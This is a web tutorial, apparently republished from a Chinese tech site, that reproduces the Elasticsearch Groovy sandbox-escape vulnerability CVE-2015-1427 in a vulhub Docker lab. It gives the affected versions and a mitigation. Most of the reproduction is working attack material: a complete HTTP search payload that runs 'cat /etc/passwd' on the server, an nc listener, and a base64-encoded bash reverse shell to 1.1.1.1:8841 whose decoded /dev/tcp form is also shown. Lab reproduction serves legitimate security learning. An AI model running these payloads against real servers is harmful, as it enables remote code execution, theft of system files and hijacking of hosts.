2025-04-06 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 05/31 Report
This article is about how to reproduce the ElasticSearch Groovy remote code execution vulnerability CVE-2015-1427. The editor thinks it is very practical, so it is shared here in the hope that you get something out of it. Let's take a look.
Elasticsearch is a Lucene-based search server. It provides a distributed, multi-tenant full-text search engine behind a RESTful web interface. It is developed in Java, released as open source under the Apache license, and is a popular enterprise search engine.
A remote code execution vulnerability (CVE-2014-3120) was disclosed in 2014: the script engine used by Elasticsearch at the time accepted MVEL script code as expressions for data manipulation, so an attacker could execute arbitrary Java code through MVEL constructs.
The scripting engine was later replaced by Groovy, and a sandbox was added so that dangerous code would be intercepted. The sandbox's restrictions were too lax, however, which led to this second remote code execution vulnerability: a whitelisted class such as java.lang.Math still exposes Class.forName() through its .class reference, and from there any class, including java.lang.Runtime, can be loaded and used.
Affected versions: Elasticsearch 1.3.0-1.3.7 and 1.4.0-1.4.2 (fixed in 1.3.8 and 1.4.3; on unpatched versions the Groovy sandbox can be switched off with script.groovy.sandbox.enabled: false in elasticsearch.yml, which disables dynamic Groovy scripting).
This article only records the reproduction of the vulnerability; the exploitation process is as follows:
I. Building the vulnerable environment
The environment in this article is built with vulhub. From the root of the vulhub checkout, run the following commands to start it:
cd elasticsearch/CVE-2015-1427
docker-compose build
docker-compose up -d
Once it is up, open port 9200 in a browser; the Elasticsearch banner is shown as follows:
Vulnerability link: http://192.168.101.152:9200/
II. Reproducing the vulnerability
To exploit this vulnerability, at least one document must exist in Elasticsearch (script fields are only evaluated against search hits), so first send the following request to add one:
POST /website/blog/ HTTP/1.1
Host: 192.168.101.152:9200
Content-Length: 16

{"name": "test"}
A 201 response means the document was created. Then send the following request to execute a command: it is an ordinary _search call whose script_fields entry carries a Groovy script that loads java.lang.Runtime through java.lang.Math.class.forName(), runs the command, and reads its output back with BufferedReader.readLines(). The Content-Length must match the body exactly; a proxy such as Burp recomputes it for you.
POST /_search?pretty HTTP/1.1
Host: 192.168.101.152:9200
Content-Length: 412

{"size":1, "script_fields": {"test#": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()", "lang": "groovy"}}}
The command executes successfully, and its output lines are returned in the fields of the search hit.
To get a reverse shell back to the attacking server:
On the server, start a listener with nc -lvvp <port> (the payload below connects to 1.1.1.1 on port 8841; replace both with your own address).
Then place the following command in the exec() call above, in place of cat /etc/passwd, to get the shell. It is written without spaces on purpose: Runtime.exec() splits its argument on whitespace and does not understand pipes or redirections, so the real payload (bash -i >& /dev/tcp/1.1.1.1/8841 0>&1) is base64-encoded and reassembled with bash brace expansion.
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzg4NDEgMD4mMQ==}|{base64,-d}|{bash,-i}
The shell connects back successfully.
The above is how to reproduce the ElasticSearch Groovy remote code execution vulnerability CVE-2015-1427. The editor believes some of these points may come up in daily work and hopes you can learn something from this article. For more details, please follow the industry information channel.